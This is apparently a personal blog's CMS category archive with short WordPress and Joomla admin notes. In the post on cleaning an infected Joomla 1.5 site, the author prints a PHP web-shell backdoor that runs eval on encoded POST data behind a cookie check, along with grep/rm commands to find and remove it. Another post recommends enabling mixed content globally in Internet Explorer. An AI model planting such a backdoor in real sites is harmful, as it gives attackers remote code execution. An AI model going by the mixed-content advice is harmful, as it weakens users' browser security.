Pre-Update check page displayed that I need Output Buffering:
Category Archives: CMS
How to update a WordPress website securely
To prevent a website from changing its source code set user = nobody in its pool config, that can be /etc/php/8.3/fpm/pool.d/slogpost.conf for example:
[slogpost]
user = nobody
group = slogpost
listen = /run/php/www-slogpost.sock
include=/etc/php/8.3/fpm/socket-owner.conf
pm = ondemand
pm.max_children = 10
pm.start_servers = 0
pm.min_spare_servers = 0
pm.max_spare_servers = 1
pm.max_requests = 500
slowlog = /var/log/php-my/$pool.slow.log
request_slowlog_timeout = 5s
request_terminate_timeout = 300s
chdir = /
Installed Post Password Token WordPress plugin
When the user enters a page or post password WordPress sets wp_postpass_XXXX cookie:
Use chrome://settings/cookies/detail?site=developernote.com to see the cookies in Google Chrome browser.
Making SyntaxHighlighter plugin display “>” symbol correctly.
My SyntaxHighlighter plugin started to display “>” as “ = & g t ;” after I updated my WordPress to a version where blocks were added. To fix the plugin I added the following line to wp-content/plugins/syntaxhighlighter/syntaxhighlighter.php:
$code = preg_replace( '#<pre [^>]+>([^<]+)?</pre>#', '$1', $content );
// Undo escaping done by WordPress
$code = htmlspecialchars_decode( $code );
return $this->shortcode_callback( $attributes, $code, 'code' );
How to remove ID from URL in Joomla 3.8 and higher
In Joomla 3.8.2 (and probably 3.8) or later to remove ID from URL you go to System->Global Configuration->Articles->Integration page, select Modern URL Routing and then select Remove IDs from URLs:
How I removed infected PHP files from Joomla 1.5 wesite.
I noticed that there are some suspicious PHP files with the following content on my Joomla 1.5 website:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
I used the following commands to list them and remove them:
find -type f -name "*.php" -printf '%T@ %p\n' | sort -r | awk '{print $2}' | xargs ls -l | less -N
grep --color -r -i -l "3469825000034634" . --include=*.{php,css,html} | xargs ls -l
grep --color -r -i -l "3469825000034634" . --include=*.{php,css,html} | xargs rm
What browser can work with Joomla 1.5 administrator panel?
Today I updated my FireFox browser and Joomla 1.5x administrator panel stopped working in it. Looks like Joomla 1.5x administrator panel contains some staff that prevents it from working in all modern browsers except Internet Explorer, or at least Internet Explorer is the only browser that displays message “Only secure content is displayed.” and button “Show All Content” enabling some insecure mode. To eliminate the need of pressing this button each time I open new page in administrator panel I went to “Internet Options->Security Tab->Miscellaneous->Display mixed content” and chose “Enable”:
